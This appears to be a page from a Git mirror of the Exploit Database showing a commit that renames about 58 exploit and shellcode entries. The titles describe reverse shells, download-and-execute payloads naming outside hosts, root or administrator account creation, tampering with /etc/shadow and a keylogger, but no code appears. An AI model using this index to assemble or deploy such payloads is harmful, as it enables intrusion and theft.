bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86/43747.c
Offensive Security 8a2e4ff27a DB: 2018-01-19 
58 changes to exploits/shellcodes

Smiths Medical Medfusion 4000 - 'DHCP' Denial of Service

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (1)

WebKit - 'WebCore::InputType::element' Use-After-Free
WebKit - 'WebCore::InputType::element' Use-After-Free (2)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (1)
Linux Kernel 2.4.22 - 'do_brk()' Local Privilege Escalation (2)

Rosoft Media Player 4.2.1 - Local Buffer Overflow
Rosoft Media Player 4.2.1 (Windows XP SP2/3 French) - Local Buffer Overflow

GNU Screen 4.5.0 - Local Privilege Escalation
GNU Screen 4.5.0 - Local Privilege Escalation (PoC)

glibc - 'getcwd()' Local Privilege Escalation

JAD java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow

JAD Java Decompiler 1.5.8e - Local Buffer Overflow
JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)

Ability Server 2.34 - Remote APPE Buffer Overflow
Ability Server 2.34 - 'APPE' Remote Buffer Overflow

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (1)

Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution
Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)

Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)

CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)
CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)

Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow
Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)

Invision Power Board 2.0.3 - 'login.php' SQL Injection
Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)

FOSS Gallery Public 1.0 - Arbitrary File Upload
FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'view_listing.php' SQL Injection

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via Disabling of IP Quarantine)

Netsweeper 4.0.8 - Authentication Bypass
Netsweeper 4.0.8 - Authentication Bypass (via New Profile Creation)

Primefaces 5.x - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)

Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)

Vastal I-Tech Agent Zone - SQL Injection
Vastal I-Tech Agent Zone - 'searchCommercial.php' / 'searchResidential.php' SQL Injection

BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)
BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)

FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)
FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)

Linux/x86 - execve() Null-Free Shellcode (Generator)
Linux/x86 - execve() + Null-Free Shellcode (Generator)

Windows XP SP1 - Bind TCP Shell Shellcode (Generator)
Windows (XP SP1) - Bind TCP Shell Shellcode (Generator)

Linux/x86 - Command Generator Null-Free Shellcode (Generator)
Linux/x86 - Command Generator + Null-Free Shellcode (Generator)
(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)
Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - HTTP/1.x Requests Shellcode (18+/26+ bytes) (Generator)
Windows/x86 - Multi-Format Encoding Tool Shellcode (Generator)
Linux/x86 - PUSH reboot() Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator Null-Free (Generator)
Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)
Linux/x86 - reboot() + PUSH Shellcode (30 bytes)
Linux/x86 - Shellcode Obfuscator + Null-Free (Generator)
Linux/x86 - Reverse UDP (54321/UDP) tcpdump Live Packet Capture Shellcode (151 bytes)

Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)
Linux/x86 - setuid(0) + execve(/bin/sh_0_0) + Null-Free Shellcode (28 bytes)

Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)
Linux/x86 - Reverse TCP (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)

Linux/x86 - execve() Read Shellcode (92 bytes)
Linux/x86 - execve() + Read Shellcode (92 bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid + Executes Command Shellcode (49+ bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() + Null-Free Shellcode (111+ bytes)
Linux/x86 - setreuid() + Executes Command Shellcode (49+ bytes)

Linux/x86 - execve(/bin/sh) (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - execve(/bin/sh)  + Re-Use Of Strings In .rodata Shellcode (16 bytes)

Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)
Linux/x86 - execve() + Diassembly + Obfuscation Shellcode (32 bytes)

Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() Null-Free Shellcode (236 bytes)
Linux/x86 - TCP Proxy (192.168.1.16:1280/TCP) All Connect() + Null-Free Shellcode (236 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode +1 Encoded (39 bytes)
Linux/x86 (Intel x86 CPUID) - execve(/bin/sh) + XORED Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) Shellcode + 1 Encoded (39 bytes)

Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve(/bin/sh) Shellcode (39 bytes)
Linux/x86 - execve(/bin/sh) + Anti-Debug Trick (INT 3h trap) Shellcode (39 bytes)

Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)
Linux/x86 - Eject CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)

Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) + exit() Shellcode (4 bytes)
Linux/x86 - (eax != 0 and edx == 0) + exit() Shellcode (4 bytes)

Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - Snoop /dev/dsp + Null-Free Shellcode (172 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) sysenter Opcode Array Payload Shellcode (45 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (23 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (27 bytes)
Linux/x86 - execve(/bin/sh) + sysenter Opcode Array Payload Shellcode (45 bytes)

Linux/x86 - Alphanumeric Encoded (IMUL Method) Shellcode (88 bytes)
Linux/x86 - Alphanumeric Encoded + IMUL Method Shellcode (88 bytes)

Linux/IA32 - execve(/bin/sh) 0xff-Free Shellcode (45 bytes)
Linux/IA32 - execve(/bin/sh) + 0xff-Free Shellcode (45 bytes)

Linux/x86 - Reverse Telnet Shell (200.182.207.235) Shellcode (134 bytes)
Linux/x86 - Reverse TCP (200.182.207.235/TCP) Telnet Shel Shellcode (134 bytes)
Linux/x86 - execve(/bin/sh) XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (41 bytes)
Linux/x86 - execve(/bin/sh) + XOR Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (41 bytes)

Linux/x86 - execve(/bin/sh) ToLower Encoded Shellcode (55 bytes)
Linux/x86 - execve(/bin/sh) + ToLower Encoded Shellcode (55 bytes)

OSX/PPC - Reboot Shellcode (28 bytes)
OSX/PPC - Reboot() Shellcode (28 bytes)
Solaris/MIPS - Download (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid + Executes Command Shellcode (92+ bytes)
Solaris/MIPS - Download File (http://10.1.1.2:80/evil-dl) + Execute (/tmp/ff) Shellcode (278 bytes)
Solaris/SPARC - setreuid() + Executes Command Shellcode (92+ bytes)

Solaris/SPARC - setreuid + execve() Shellcode (56 bytes)
Solaris/SPARC - setreuid() + execve() Shellcode (56 bytes)

Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) Null-Free Shellcode (39 bytes)
Solaris/x86 - setuid(0) + execve(/bin/sh) + exit(0) + Null-Free Shellcode (39 bytes)
Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows XP SP2 x86 (English) - cmd.exe Shellcode (23 bytes)
Windows x86 - Egg Omelet SEH Shellcode
Windows x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows XP SP2 x86 (French) - cmd.exe Shellcode (32 bytes)
Windows XP SP2 x86 - cmd.exe Shellcode (57 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows x86 - PEB _Kernel32.dll_ ImageBase Finder (ASCII Printable) Shellcode (49 bytes)
Windows x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows x86 - Download File + Execute Shellcode (192 bytes)
Windows x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows NT/XP x86 - IsDebuggerPresent Shellcode (39 bytes)
Windows SP1/SP2 x86 - Beep Shellcode (35 bytes)
Windows XP SP2 x86 - MessageBox Shellcode (110 bytes)
Windows x86 - Command WinExec() Shellcode (104+ bytes)
Windows x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows NT/2000/XP (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows 9x/NT/2000/XP - Reverse Generic without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)
Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)
Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows XP/2000/2003 - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows XP - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) Null-Free Shellcode
Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)
Windows/x86 (5.0 < 7.0) - Bind TCP (28876/TCP) Shell + Null-Free Shellcode
Windows/x86 (XP SP2) (English) - cmd.exe Shellcode (23 bytes)
Windows/x86 - Egg Omelet SEH Shellcode
Windows/x86 - Add Administrator User (GAZZA/123456) + Start Telnet Service Shellcode (111 bytes)
Windows/x86 - PEB!NtGlobalFlags Shellcode (14 bytes)
Windows/x86 (XP SP2)  (French) - cmd.exe Shellcode (32 bytes)
Windows/x86 (XP SP2) - cmd.exe Shellcode (57 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + Alphanumeric Shellcode (67 bytes)
Windows/x86 - PEB _Kernel32.dll_ ImageBase Finder + ASCII Printable Shellcode (49 bytes)
Windows/x86 - Reverse Connection + Download A File + Save + Execute Shellcode
Windows/x86 - Download File + Execute Shellcode (Browsers Edition) (275+ bytes) (Generator)
Windows/x86 - Download File + Execute Shellcode (192 bytes)
Windows/x86 - Download File (http://127.0.0.1/file.exe) + Execute Shellcode (124 bytes)
Windows/x86 (NT/XP) - IsDebuggerPresent Shellcode (39 bytes)
Windows/x86 (SP1/SP2) - Beep Shellcode (35 bytes)
Windows/x86 (XP SP2) - MessageBox Shellcode (110 bytes)
Windows/x86 - Command WinExec() Shellcode (104+ bytes)
Windows/x86 - Download File (http://www.ph4nt0m.org/a.exe) + Execute (C:/a.exe) Shellcode (226+ bytes)
Windows (NT/2000/XP) (Russian) - Add Administartor User (slim/shady) Shellcode (318 bytes)
Windows (9x/NT/2000/XP) - Reverse Generic Without Loader (192.168.1.11:4919) Shellcode (249 bytes)
Windows  (9x/NT/2000/XP) - PEB method Shellcode (29 bytes)
Windows  (9x/NT/2000/XP) - PEB Method Shellcode (31 bytes)
Windows (9x/NT/2000/XP) - PEB method Shellcode (35 bytes)
Windows (XP/2000/2003) - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)
Windows (XP/2000/2003) - Download File (http://127.0.0.1/test.exe) + Execute (%systemdir%/a.exe) Shellcode (241 bytes)
Windows (XP) - Download File (http://www.elitehaven.net/ncat.exe) + Execute (nc.exe) + Null-Free Shellcode
Windows (XP SP1) - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)

Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Windows/x86-64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)

Linux/x86 - setuid(0) + execve(_/sbin/poweroff -f_) Shellcode (47 bytes)
Linux/x86 - setuid(0) + execve(/sbin/poweroff -f) Shellcode (47 bytes)

Windows XP SP2 - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows (XP SP2) - PEB ISbeingdebugged Beep Shellcode (56 bytes)
Windows XP SP3 x86 - ShellExecuteA Shellcode
Linux/x86 - setreuid (0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows XP SP3 x86 - Add Firewall Rule (Allow 445/TCP) Traffic Shellcode
Windows/x86 (XP SP3) - ShellExecuteA Shellcode
Linux/x86 - setreuid(0_0) + execve(/bin/rm /etc/shadow) Shellcode
Windows/x86 (XP SP3) - Add Firewall Rule (Allow 445/TCP) Shellcode

Windows XP SP2 x86 - calc.exe Shellcode (45 bytes)
Windows/x86 (XP SP2) - calc.exe Shellcode (45 bytes)

Windows XP SP2 x86 (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows/x86 (XP SP2)  (English / Arabic) - cmd.exe Shellcode (23 bytes)
Windows XP Professional SP2 (English) - MessageBox Null-Free Shellcode (16 bytes)
Windows XP Professional SP2 (English) - Wordpad Null-Free Shellcode (12 bytes)
Windows  (XP Professional SP2) (English) - MessageBox + Null-Free Shellcode (16 bytes)
Windows  (XP Professional SP2) (English) - Wordpad + Null-Free Shellcode (12 bytes)

Windows XP SP2 x86 (French) - calc Shellcode (19 bytes)
Windows/x86 (XP SP2)  (French) - calc Shellcode (19 bytes)
Windows XP SP3 x86 (English) - cmd.exe Shellcode (26 bytes)
Windows XP SP2 x86 (Turkish) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP3)  (English) - cmd.exe Shellcode (26 bytes)
Windows/x86 (XP SP2) (Turkish) - cmd.exe Shellcode (26 bytes)
Windows XP Home SP2 (English) - calc.exe Shellcode (37 bytes)
Windows XP Home SP3 (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP2) (English) - calc.exe Shellcode (37 bytes)
Windows (XP Home SP3) (English) - calc.exe Shellcode (37 bytes)
Windows x86 - JITed Stage-0 Shellcode
Windows x86 - JITed exec notepad Shellcode
Windows XP Professional SP2 (Italian) - calc.exe Shellcode (36 bytes)
Windows XP SP2 x86 - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter JITed Stage-0 Shellcode
Windows XP SP3 x86 (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows x86 - MessageBox Shellcode (Metasploit)
Windows XP/Vista/7 - Egghunter JITed Stage-0 Adjusted Universal Shellcode
Windows/x86 - JITed Stage-0 Shellcode
Windows/x86 - JITed exec notepad Shellcode
Windows (XP Professional SP2) (Italian) - calc.exe Shellcode (36 bytes)
Windows/x86 (XP SP2) - write.exe + ExitProcess WinExec Shellcode (16 bytes)
Windows - Egghunter (0x07333531) JITed Stage-0 Shellcode
Windows/x86 (XP SP3)  (Russia) - cmd + ExitProcess WinExec Shellcode (12 bytes)
Windows/x86 - MessageBox Shellcode (Metasploit)
Windows (XP/Vista/7) - Egghunter (0x07333531) JITed Stage-0 Adjusted Universal Shellcode

Linux/x86 - execve(/bin/sh) Shellcode (25 bytes) (2)
Linux/x86 - execve(/bin/sh) Shellcode (25 bytes)

Linux/x86 - execve(_a->/bin/sh_) Local-only Shellcode (14 bytes)
Linux/x86 - execve(a->/bin/sh) + Local-only Shellcode (14 bytes)

Linux/x86 - setreud(getuid()_ getuid()) + execve(_/bin/sh_) Shellcode (34 bytes)
Linux/x86 - setreud(getuid()_ getuid()) + execve(/bin/sh) Shellcode (34 bytes)

Windows XP SP2 (French) - Download File (http://www.site.com/nc.exe_) + Execute (c:\backdor.exe) Shellcode
Windows (XP SP2) (French) - Download File (http://www.site.com/nc.exe) + Execute (c:\backdor.exe) Shellcode

Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)
Linux/x86 - execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) Shellcode (45 bytes)

Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)
Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)

Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)
Linux/x86 - chmod 0777 /etc/shadow +  sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)
Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)
Windows 7 x64 - cmd Shellcode (61 bytes)
Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)
Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)
Windows/x86-64 (7) - cmd Shellcode (61 bytes)
Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)
Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)
Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)
Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode

Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)
Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)
Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)
Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)

Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)
Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode
Windows Mobile 6.5 TR - Phone Call Shellcode
Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Windows/ARM  (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode
Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode
Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)

Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode
Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode

Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode
Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode

Windows x86 - Eggsearch Shellcode (33 bytes)
Windows/x86 - Eggsearch Shellcode (33 bytes)

Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)
Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode
Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)
Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)
Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode
Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode

Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)
Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)
Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter Shellcode (31 bytes)
Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)
Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox Null-Free Shellcode (113 bytes)
Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Windows - MessageBox + Null-Free Shellcode (113 bytes)
Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)
Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)
Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)

Linux/x86 - rmdir Shellcode (37 bytes)
Linux/x86 - rmdir() Shellcode (37 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)
Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)

Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)

Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)

Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)
Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)

Linux/x86 - Egghunter Shellcode (20 bytes)
Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)
Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)
Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Shellcode (57 bytes)
Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)
Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)

Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)
Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)

Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)
Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)

Linux/x86 - Reboot Shellcode (28 bytes)
Linux/x86 - Reboot() Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter Shellcode (19 bytes)
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode
Windows 2003 x64 - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)
Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode
Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)
Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)
Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)
Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode
Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)
OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)

Linux/x86-64 - Egghunter Shellcode (24 bytes)
Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)

Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)
Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)
Linux/x86-64 - Egghunter Shellcode (18 bytes)
Linux/x86 - Egghunter Shellcode (13 bytes)
Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)
Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)

Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)
Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)

Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
